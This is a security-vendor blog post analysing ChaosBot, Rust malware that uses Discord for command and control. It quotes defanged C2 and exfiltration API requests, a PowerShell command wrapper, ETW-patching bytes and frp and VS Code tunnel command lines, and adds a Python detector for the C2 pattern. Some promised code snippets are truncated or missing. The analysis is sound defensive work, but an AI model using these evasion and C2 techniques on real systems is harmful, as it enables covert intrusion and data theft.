New Rust Malware "ChaosBot" Leverages Discord for Stealthy Command and Control
The sophisticated, Rust-based malware, dubbed ChaosBot, has been exposed utilizing the Discord platform for its Command and Control (C2) operations. This isn't your average botnet; it's a new generation of threat that hides its malicious traffic by communicating over the popular, legitimate service [1].
ChaosBot operates by validating its credentials with the Discord API, then creating a private text channel named after its victim's computer. This channel serves as an interactive, covert shell. Attackers send commands, such as shell, download, and scr (screenshot), directly into the channel, and the victim machine sends the results back as attached files. Further compounding the danger, the malware uses anti-analysis techniques like patching the Windows ETW function and checking for Virtual Machine MAC addresses to stay off the radar of security researchers.
This blog post offers a comprehensive analysis of the ChaosBot malware, detailing its unique infection chain and Discord-based Command and Control (C2). We conclude with essential mitigation strategies.
Attack Vector and Initial Access
The initial intrusion was facilitated by compromised credentials for both CiscoVPN and an over-privileged Active Directory account named "serviceaccount." The attackers leveraged this access to deploy and execute ChaosBot using WMI (Windows Management Instrumentation) for remote command execution across the network.
The ChaosBot payload, disguised as msedge_elf.dll, was executed via DLL side-loading against the legitimate Microsoft Edge component identity_helper.exe from the C:\Users\Public\Libraries directory.
Alternate Initial Access: Malicious Shortcut Phishing
In an alternative and equally insidious method, ChaosBot operators employ phishing campaigns that use malicious Windows Shortcut (.lnk) files. These shortcuts are designed to appear as legitimate correspondence from the State Bank of Vietnam.
The shortcut executes a PowerShell command that serves two purposes:
- Downloads and executes the ChaosBot malware.
- Simultaneously downloads and opens an innocuous PDF document to mislead the victim, providing a deceptive cover for the infection.
The PowerShell snippet responsible for this decoy and deployment is shown below:
The document is designed to look like a highly official communication from a major Vietnamese government body:
- NGÂN HÀNG NHÀ NƯỚC VIỆT NAM translates to the State Bank of Vietnam (the country's central bank). This immediately lends maximum credibility to the document.
- CHI NHÁNH KHU VỰC 6 means Area/Region 6 Branch. This specifies a particular branch of the central bank, making the notice seem more targeted and relevant.
- Số: 2557 /KV6-TTKQ is the official reference number and code, mimicking a standard government document identifier.
- V/v Thông báo về việc thực hiện các yêu cầu quản lý, giám sát mới đối với tổ chức tín dụng và ngân hàng từ ngày 01/10 translates to the subject: "Notice on the implementation of new management and supervision requirements for credit institutions and banks from October 1st."
In short, the decoy PDF is a fake, highly formal official regulatory notice from the central bank, instructing financial institutions on new compliance and oversight requirements.
ChaosBot's Discord-Based C2 Protocol
ChaosBot is written in the Rust programming language, leveraging either the reqwest or serenity library for API interactions. The malware is configured with a Discord bot token, Guild (server) ID, and Channel ID.
1. Token Validation and Initial Check-in
The malware first validates its bot token with a simple GET request to the Discord API:
GET hxxps://discord[.]com/api/v10/users/@me
This action requires the bot token to be correctly formatted in the Authorization header, as demonstrated in this snippet of disassembled instructions, which show the construction of the "Bot " prefix and the subsequent call to send the request:
try {
2. Creating a Victim Channel
Upon successful validation, ChaosBot creates a new, dedicated channel within the threat actor's Discord server, naming it after the victim's computer name.
POST hxxps://discord[.]com/api/v10/guilds/<THREAT_ACTOR_GUILD_ID>/channels {"name":"<VICTIM_COMPUTER_NAME>","type":0}
The malware then sends an initial message to the general channel, notifying the operators of the new compromise:
{"content":"Host <VICTIM_COMPUTER_NAME> connected, channel created: <#<NEW_VICTIM_CHANNEL_ID>>"}
Intriguingly, the general channel across all known affiliated servers is named "常规" (meaning "regular" or "general" in Chinese), which may suggest the operators are using a Chinese version of Discord.
3. Command Execution and Data Exfiltration
ChaosBot operates via a continuous loop, checking for new messages (commands) in the victim's dedicated Discord channel. The primary command for lateral movement and reconnaissance is shell.
A detail worth noting for detection: when running shell commands, the malware uses a consistent PowerShell command line that forces UTF-8 encoding for the output:
powershell -Command "$OutputEncoding = [System.Text.Encoding]::UTF8; <SOME_COMMAND> "
After command execution, the results, whether stdout/stderr from a shell command, a screenshot, or a file, are exfiltrated back to the channel as an attachment using the multipart/form-data format:
POST hxxps://discord[.]com/api/v10/channels/<NEW_VICTIM_CHANNEL_ID>/messages HTTP/1.1
This interaction is highly effective, giving the attacker a seamless, interactive shell experience via Discord:
- ChaosBot APP 11:10 PM: shell systeminfo (command to victim machine)
- Host Name: DESKTOP-LI1QSPG, OS Name: Microsoft Windows 10 Pro (results from victim machine)
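The three-step check-in described above (token validation, victim channel creation, multipart upload) is distinctive enough to detect from proxy or network-sensor logs. The following Python is an added example, not code from the original post or from eSentire; the log records and the token value are constructed placeholders, and the field names are assumed.

```python
import json
import re
from collections import defaultdict

# Constructed proxy log records (not from the original post), one dict per
# request; field names are assumed and the token is a placeholder, not real.
SAMPLE_LOG = [
    {"host": "WS-01", "method": "GET", "url": "https://discord.com/api/v10/users/@me",
     "auth": "Bot PLACEHOLDER_TOKEN", "ctype": "", "body": ""},
    {"host": "WS-01", "method": "POST", "url": "https://discord.com/api/v10/guilds/1111/channels",
     "auth": "Bot PLACEHOLDER_TOKEN", "ctype": "application/json",
     "body": json.dumps({"name": "ws-01", "type": 0})},
    {"host": "WS-01", "method": "POST", "url": "https://discord.com/api/v10/channels/2222/messages",
     "auth": "Bot PLACEHOLDER_TOKEN", "ctype": "multipart/form-data; boundary=xyz", "body": ""},
    # Benign: a user OAuth token rather than a bot token, so it never matches.
    {"host": "WS-02", "method": "GET", "url": "https://discord.com/api/v10/users/@me",
     "auth": "Bearer PLACEHOLDER_USER_TOKEN", "ctype": "", "body": ""},
]

API = re.compile(r"^https://discord\.com/api/v\d+/(?P<path>.*)$")
FULL_CHAIN = {"validate_token", "create_victim_channel", "exfil_attachment"}

def classify(rec):
    """Map one request to a ChaosBot C2 stage, or None if it does not match."""
    m = API.match(rec["url"])
    if not m or not rec["auth"].startswith("Bot "):
        return None
    path, method = m.group("path"), rec["method"]
    if method == "GET" and path == "users/@me":
        return "validate_token"
    if method == "POST" and re.fullmatch(r"guilds/\d+/channels", path):
        try:
            name = json.loads(rec["body"]).get("name", "")
        except ValueError:
            return None
        # The new channel is named after the victim host, which a sensor can verify.
        return "create_victim_channel" if name.lower() == rec["host"].lower() else None
    if method == "POST" and re.fullmatch(r"channels/\d+/messages", path) \
            and rec["ctype"].startswith("multipart/form-data"):
        return "exfil_attachment"
    return None

def detect(records):
    """Return {host: sorted stages seen}; a host covering FULL_CHAIN is a strong hit."""
    seen = defaultdict(set)
    for rec in records:
        stage = classify(rec)
        if stage:
            seen[rec["host"]].add(stage)
    return {host: sorted(stages) for host, stages in seen.items()}
```

A single stage (for example, a bot-token request to users/@me) can be legitimate automation; alerting on a host that reproduces the whole chain keeps the false-positive rate low.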
ChaosBot Command Capabilities
| Command | Description |
|---|---|
| shell <command> | Executes the command via PowerShell and uploads the output to the Discord channel as a TXT file. |
| download <url> <path> | Downloads a file from the internet to the victim device. |
| scr | Captures a screenshot of the victim device and uploads it to the Discord channel as a PNG file. |
| upload <src_path> | Uploads the specified file from the victim device to the Discord channel. |
Evasion and Persistence Techniques
ChaosBot employs sophisticated techniques to evade detection and analysis.
ETW Evasion (Event Tracing for Windows)
New variants patch the first few instructions of ntdll!EtwEventWrite in memory, specifically by replacing the initial instructions with xor eax, eax followed by ret. This successfully disables ETW telemetry for the process, hindering EDR (Endpoint Detection and Response) and sandbox visibility.
The patching process involves first calling VirtualProtect to change memory permissions:
BA 03 00 00 00 mov edx, 3
Followed by the patching of the first few bytes with the new instructions:
66 C7 03 31 C0 mov word ptr [rbx], 0C031h ; xor eax, eax
Anti-VM Check
The malware checks the system's MAC addresses against known prefixes for virtual machines such as VMware (00:0C:29, 00:50:56, 00:05:69) and VirtualBox (08:00:27). If a match is found, the malware halts execution to evade analysis in sandboxed environments.
loc_7FF7561171A4: ; 00:0C:29 -> VMware, Inc.
Post-Compromise: Reverse Proxy and Secondary Backdoors
Following initial compromise, the threat actors immediately focused on establishing persistent access and bypassing perimeter controls.
Fast Reverse Proxy (FRP) Deployment
The download and shell commands were used to deploy and execute the legitimate tool fast reverse proxy (frp), saving the executable as node.exe and the configuration as node.ini in the Public user directory.
shell c:\\users\\public\\music\\node.exe -c c:\\users\\public\\music\\node.ini
The configuration shows the proxy is set to connect to an Amazon Web Services (AWS) IP in the Asia Pacific (Hong Kong) region, allowing for persistent, covert access:
#frpc.ini [common]
Experimentation with VS Code Tunnels
Attackers also attempted to set up an additional backdoor using the legitimate Visual Studio Code Tunnel service. While the command ultimately failed due to a lack of interactive handling for the required authentication prompt (Microsoft Account or GitHub), it reveals an active effort to experiment with and leverage trusted cloud service features for command/script execution capabilities.
shell (echo | c:\\users\\public\\music\\code.exe tunnel service install > c:\\users\\public\\music\\log)
Recommendations and Mitigations
The ChaosBot analysis provides clear takeaways for strengthening security posture:
- Enforce Strong Authentication: Immediately implement Multi-Factor Authentication (MFA) for all external access points (e.g., VPN) and privileged accounts (e.g., Active Directory service accounts) to prevent credential compromise-based initial access.
- Restrict WMI Use: Monitor and restrict WMI usage, especially for command execution from service accounts. Treat all remote WMI execution as highly suspicious.
- Monitor Discord Traffic: Actively monitor for unusual HTTP/S traffic to Discord API endpoints, particularly POST requests authenticated with bot tokens, which are a key indicator of C2 activity.
- Enforce Application Whitelisting: Implement application control solutions to prevent the execution of unauthorized payloads like msedge_elf.dll and known suspicious programs (node.exe, frpc.exe, etc.) from unapproved locations like the Public user profile directories.
- Educate on Phishing: Conduct regular training on phishing threats, emphasizing the risks associated with unexpected files, especially shortcut (.lnk) files, even if they appear to lead to legitimate documents.
- Monitor for Evasion: Ensure EDR solutions are configured to detect and prevent common memory-patching techniques like the EtwEventWrite hook utilized by ChaosBot.
How Picus Helps Defend Against ChaosBot Malware Attacks
The Picus Security Validation Platform safely simulates the ChaosBot malware campaign. Through the Picus Threat Library, it replicates the tactics, techniques, and procedures (TTPs) observed in these campaigns to reveal detection and prevention gaps across EDR, NGFW, and SIEM technologies, before adversaries can exploit them.
You can also test your defenses against hundreds of other malware variants, such as SnipBot, SlipScreen Loader, and RustyClaw, within minutes with a 14-day free trial of the Picus Platform.
| Threat ID | Threat Name | Attack Module |
|---|---|---|
| 47754 | ChaosBot Backdoor Malware Download Threat | Network Infiltration |
| 60321 | ChaosBot Backdoor Malware Email Threat | Email Infiltration |
References
[1] “New Rust Malware ‘ChaosBot’ Uses Discord for Command and Control,” eSentire, Oct. 09, 2025. Available: https://www.esentire.com/blog/new-rust-malware-chaosbot-uses-discord-for-command-and-control. [Accessed: Oct. 17, 2025]